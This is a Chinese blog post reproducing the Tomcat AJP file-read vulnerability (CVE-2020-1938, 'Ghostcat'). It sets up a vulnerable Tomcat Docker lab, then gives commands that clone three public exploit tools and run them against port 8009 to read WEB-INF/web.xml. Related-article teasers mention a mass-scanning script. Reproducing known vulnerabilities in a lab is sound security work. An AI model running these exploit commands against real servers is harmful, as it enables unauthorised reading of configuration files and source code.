Tomcat AJP协议文件读取漏洞

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量1.9k 收藏 2
点赞数 1
分类专栏: Tomcat 漏洞复现 漏洞复现 文章标签: tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/124799545
版权

漏洞描述:

Tomcat在 server.xml中配置了两种连接器:

1.HTTP Connector:监听8080端口,负责建立HTTP连接。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器。

2.AJP Connector:监听8009端口,负责和其他的HTTP服务器建立连接,通过AJP协议和另一个Web容器进行交互。

漏洞利用条件:

Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等

漏洞影响范围:

Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

漏洞复现:

靶场的搭建:

1、Docker部署环境,搜索受影响的tomcat镜像

~# docker search tomcat-8.5

~# docker pull duonghuuphuc/tomcat-8.5.32

2、拉取完成后运行,并通过浏览器访问:

~# docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32 

 3、漏洞利用:

EXP1:AjpShooter:git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git

                                  python  ajpShooter.py  http://<靶场IP> 8009 WEB-INF/web.xml read

 

EXP2:Ghostcat:git clone git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 

python  CNVD-2020-10487-Tomcat-Ajp-lfi.py  <目标ip>  -p <ajp端口>  -f  <读取文件>

EXP3:AJPy:git clone https://github.com/hypn0s/AJPy

 版本探测:python tomcat.py --port <port> version <IP>

 文件读取:python tomcat.py read_file --webapp=manager /WEB-INF/web.xml <地址>

 

想要暴富的小林子
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat Ajp文件读取漏洞复现(CVE-2020-1938)
drhrht的博客
04-10 1496
漏洞简介 由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 https://cve.mitre.org/cgi-bin/cvename.cginame=2020-1938 影响范围 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 环境搭建
Tomcat Ajp文件读取(CVE-2020-1938) 的漏洞复现
陈瘦瘦的迪迦的博客
07-30 859
Tomcat Ajp文件读取(CVE-2020-1938) 的漏洞复现 漏洞形成原因 Tomcat默认开启的AJP服务(8009端口漏洞如何利用 由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件漏洞影响范围 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1414
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
好好睡觉
02-17 4125
tomcat漏洞、幽灵猫漏洞、apache反向代理tomcat
Tomcat】CVE-2020-1938 漏洞复现&解决
yjw2017的博客
09-14 1206
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
2021-02-01-apache8009漏洞修复
Be Smart
03-21 1215
layout: post title: “Apache-8009漏洞问题修复” categories: [网络安全CyberSecurity] 重要的先说: 尤其是需要检查ssh端口是否在防火墙规则,改完之后,记得新开窗口,先测试ssh是否被影响 尤其是需要检查ssh端口是否在防火墙规则,改完之后,记得新开窗口,先测试ssh是否被影响 尤其是需要检查ssh端口是否在防火墙规则,改完之后,记得新开窗口,先测试ssh是否被影响 1.首先登陆cms服务器,查看系统版本 命令:cat /etc/redhat-.
Tomcat 文件包含漏洞(CVE-2020-1938)复现
weixin_51198941的博客
09-07 622
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。
关于对Apache Tomcat 文件包含高危漏洞开展安全加固的预警通报(1).doc
07-16
2020-1938 对应 CNVD-2020-10487)是近期发现的一项高危安全漏洞,该漏洞存在于 Tomcat 服务器的 AJP 协议中,攻击者可以通过构造特定参数的方式,读取服务器 webapp 目录下任意文件。如果服务器同时具备文件上传...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成...
Tomcat-Ajp-lfi_python_
10-01
【标题】"Tomcat-Ajp-lfi_python_" 涉及的是一个针对Apache Tomcat服务器的AJP协议Local File Inclusion(LFI)漏洞利用的Python脚本。这个标题表明了我们将探讨的话题是关于网络安全,特别是针对Web服务器的攻击...
CNVD-2020-10487-Tomcat-Ajp-lfi-master.zip
03-11
2. **CVE-2020-1938**:这个漏洞,称为“Tomcat AJP协议路径遍历”,允许攻击者通过AJP(Apache JServ Protocol)连接发送特殊构造的请求,可能导致服务器上的文件被任意读取,或者在某些配置下执行任意代码。AJP是...
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2...
Tomcat漏洞解析与复现
LJH1999ZN的博客
03-31 3180
Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。 一、Aapach
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5275
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
Tomcat文件读取&文件包含漏洞(CVE-2020-1938)
黑白的博客
06-20 4804
好好学习,天天向上。
ajp8009端口分析
u011623002的博客
03-01 4907
1,AJP是什么? 最近有一个ajp文件包含漏洞CVE-2020-1938很火,因此就研究了一下tomcatajp服务,复现了该漏洞。首先我们来看一下ajp是什么? ajptomcat的一个转发协议,通过这个协议,我们可以在自己的客户端上远程访问另一头的tomcat服务器。例如,原本我们打开tomcat,在自己的浏览器输入localhost就可以访问tomcat,而配置了ajp协议的服务器,...
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(1)
m0_60606468的博客
04-06 867
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
AJP13漏洞利用
热门推荐
爱测未来团队博客
10-31 1万+
前言 平时学习过程中使用nmap扫描目标服务器或者C段的时候经常会发现8009端口AJP13服务,一直没有很在意这个服务是干嘛的。直到遇见一个服务器没有开放其他多余的端口情况下迫不得已要弄清楚,开放的这个服务是干什么的,MSF下的脚本又使用不方便功能单一,所以就有了这个文章。 AJP13服务简介 AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WE
中间件安全—Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 6011
链接。
Tomcat AJP协议攻击
05-26
Tomcat AJP协议攻击是一种利用Tomcat应用服务器中的AJP(Apache JServ 协议协议漏洞或存在弱口令等安全问题的攻击方式。攻击者通过AJP协议访问Tomcat应用服务器的服务端口,从而获得未授权的对应用程序的访问权限。攻击者可以利用该漏洞实施远程代码执行攻击、敏感信息泄露等多种攻击手段。为有效遏制此类攻击,应当及时修复漏洞,并加强对应用程序的访问控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值